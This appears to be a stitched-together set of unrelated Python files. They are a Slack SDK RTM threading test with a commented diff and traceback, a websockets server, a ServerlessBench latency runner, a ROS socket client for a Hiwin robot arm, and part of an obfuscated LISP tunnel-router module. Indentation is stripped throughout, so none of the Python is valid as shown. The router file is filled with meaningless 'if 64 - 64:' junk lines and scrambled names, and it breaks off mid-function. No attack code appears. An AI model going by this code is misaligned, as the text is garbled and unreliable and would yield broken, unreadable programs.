SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from integration_tests.helpers import is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slack-sdk/issues/605
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
@pytest.mark.skipif(condition=is_not_specified(), reason="To avoid rate_limited errors")
def test_issue_605(self):
self.text = "This message was sent to verify issue #605"
self.called = False
@RTMClient.run_on(event="message")
def process_messages(**payload):
self.logger.info(payload)
self.called = True
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
try:
t.start()
self.assertFalse(self.called)
time.sleep(3)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertTrue(self.called)
finally:
t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread
|
server.py
|
#!/usr/bin/env python3
import asyncio
import random
import websockets
import threading
import time
from queue import Queue
event_loop = None
websocket = None
connection_ready = threading.Semaphore(value=0)
recievied_data = Queue()
def server_thread_body():
""" The body of the thread where asyncio event loop lives
"""
global event_loop
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
start_server = websockets.serve(receive, '127.0.0.1', 5678)
event_loop.run_until_complete(start_server)
print ('Server started')
event_loop.run_forever()
async def receive(new_websocket, path):
""" Setup a connection and receive data from the client
The coroutine is invoked by the websocket server when the page
is loaded (when the page requests for a websocket). It releases
the `connection_ready` semaphore what starts main synchronous loop
of the script.
After that it is an infinite coroutine run on the websocket server.
It awaits for any messages, and process them when arrive.
"""
global websocket, connection_ready, recievied_data
print(f"Server accessed at path: '{path}'")
websocket = new_websocket
connection_ready.release()
while True:
data = await websocket.recv()
recievied_data.put(data)
async def send(data):
""" Send `data` to the client
"""
global websocket
print(f"Sent: {data}")
await websocket.send(data)
def send_append(data):
""" Append sending `data` to the client
This function is a wrapper that injects a `Task` into `event_loop`
It is necessary to ensure proper thread synchronization
"""
global event_loop
event_loop.create_task(send(data))
server_thread = threading.Thread(target=server_thread_body)
server_thread.daemon = True
server_thread.start()
# We wait here for the server to start and client to connect
connection_ready.acquire()
print('Main synchronous loop start')
while True:
data = "{:0>9}".format(random.randint(0,999999999))
event_loop.call_soon_threadsafe(send_append, data)
time.sleep(2.0)
while not recievied_data.empty():
print("Recieved: {}".format(recievied_data.get()))
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "arraySum_chained"
actionName = "arraySum_sequence"
params = "--param n 0"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','']
i = 0
count = 0
while count < 2:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
HiwinRA605_socket_ros_20190521164955.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' #設定傳輸資料初始直
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.0.1', 8080))#iclab 5
s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : '))
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
###test 0403
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
# feedback = 0
# socket_client_arm_state(feedback)
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import time
import select
import threading
import os
import copy
from subprocess import getoutput
import binascii
try :
import pcappy
except :
pass
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import pcapy
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = [ None , None , None ]
OOO0o0o = None
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = None
Ooo = lisp . lisp_get_ephemeral_port ( )
o0oOoO00o = None
i1 = None
oOOoo00O0O = None
if 15 - 15: I1IiiI
O0ooo00OOo00 = [ ]
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
iIiiI1 = None
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
def O00oooo0O ( parameter ) :
global O0ooo00OOo00
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
O0ooo00OOo00 ) )
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
def Ii1IOo0o0 ( parameter ) :
global O0ooo00OOo00
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , O0ooo00OOo00 ,
True ) )
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
if 95 - 95: OOooOOo / OoooooooOO
if 18 - 18: i11iIiiIii
if 46 - 46: i1IIi / I11i % OOooOOo + I1Ii111
if 79 - 79: I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - iII111i
if 8 - 8: I1IiiI
if 75 - 75: iIii1I11I1II1 / OOooOOo % o0oOOo0O0Ooo * OoOoOO00
if 9 - 9: OoO0O00
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
for O0o0 in list ( kv_pair . keys ( ) ) :
OO00Oo = kv_pair [ O0o0 ]
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if 86 - 86: I11i / IiII % i11iIiiIii
if 7 - 7: ooOoO0o * OoO0O00 % oO0o . IiII
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if 62 - 62: iIii1I11I1II1 * OoOoOO00
if ( O0o0 == "group-prefix" ) :
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1OOO . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1OOO
if 59 - 59: II111iiii + OoooooooOO * OoOoOO00 + i1IIi
if ( O0o0 == "rloc-prefix" ) :
Oo0OoO00oOO0o = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Oo0OoO00oOO0o . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = Oo0OoO00oOO0o
if 80 - 80: oO0o + OOooOOo - OOooOOo % iII111i
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if 63 - 63: I1IiiI - I1ii11iIi11i + O0 % I11i / iIii1I11I1II1 / o0oOOo0O0Ooo
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
for o000O0o in lisp . lisp_glean_mappings :
if ( ( "eid-prefix" in o000O0o ) ^ ( "eid-prefix" in oO0Oo ) ) : continue
if ( ( "eid-prefix" in o000O0o ) and ( "eid-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "eid-prefix" ]
oO0OOoo0OO = oO0Oo [ "eid-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if 21 - 21: I1IiiI * iIii1I11I1II1
if ( ( "group-prefix" in o000O0o ) ^ ( "group-prefix" in oO0Oo ) ) : continue
if ( ( "group-prefix" in o000O0o ) and ( "group-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "group-prefix" ]
oO0OOoo0OO = oO0Oo [ "group-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 91 - 91: IiII
if 15 - 15: II111iiii
if ( ( "rloc-prefix" in o000O0o ) ^ ( "rloc-prefix" in oO0Oo ) ) : continue
if ( ( "rloc-prefix" in o000O0o ) and ( "rloc-prefix" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "rloc-prefix" ]
oO0OOoo0OO = oO0Oo [ "rloc-prefix" ]
if ( iI1iII1 . is_exact_match ( oO0OOoo0OO ) == False ) : continue
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if ( ( "instance-id" in o000O0o ) ^ ( "instance-id" in oO0Oo ) ) : continue
if ( ( "instance-id" in o000O0o ) and ( "instance-id" in oO0Oo ) ) :
iI1iII1 = o000O0o [ "instance-id" ]
oO0OOoo0OO = oO0Oo [ "instance-id" ]
if ( iI1iII1 != oO0OOoo0OO ) : continue
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
return
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
lisp . lisp_glean_mappings . append ( oO0Oo )
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
def iiii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
def oo0o00O ( mc , parms ) :
o00O0OoO , Oo0OoO00oOO0o , i1I , OoOO = parms
if 53 - 53: Oo0Ooo
iI1Iii = "{}:{}" . format ( Oo0OoO00oOO0o . print_address_no_iid ( ) , i1I )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
oO00OOoO00 = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( OoOO , lisp . red ( iI1Iii , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
for i1I1iI1iIi111i in mc . rloc_set :
if ( i1I1iI1iIi111i . rle ) :
for iiIi1IIi1I in i1I1iI1iIi111i . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name != OoOO ) : continue
iiIi1IIi1I . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
o0OoOO000ooO0 = iiIi1IIi1I . address . print_address_no_iid ( ) + ":" + str ( iiIi1IIi1I . translated_port )
if 56 - 56: iII111i
lisp . lprint ( oO00OOoO00 . format ( "RLE" , o0OoOO000ooO0 ) )
if 86 - 86: II111iiii % I1Ii111
if 15 - 15: i1IIi * I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if ( i1I1iI1iIi111i . rloc_name != OoOO ) : continue
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
o0OoOO000ooO0 = i1I1iI1iIi111i . rloc . print_address_no_iid ( ) + ":" + str ( i1I1iI1iIi111i . translated_port )
if 62 - 62: OOooOOo + O0
if ( o0OoOO000ooO0 in lisp . lisp_crypto_keys_by_rloc_encap ) :
oO0OOOO0 = lisp . lisp_crypto_keys_by_rloc_encap [ o0OoOO000ooO0 ]
lisp . lisp_crypto_keys_by_rloc_encap [ iI1Iii ] = oO0OOOO0
if 26 - 26: Ii1I
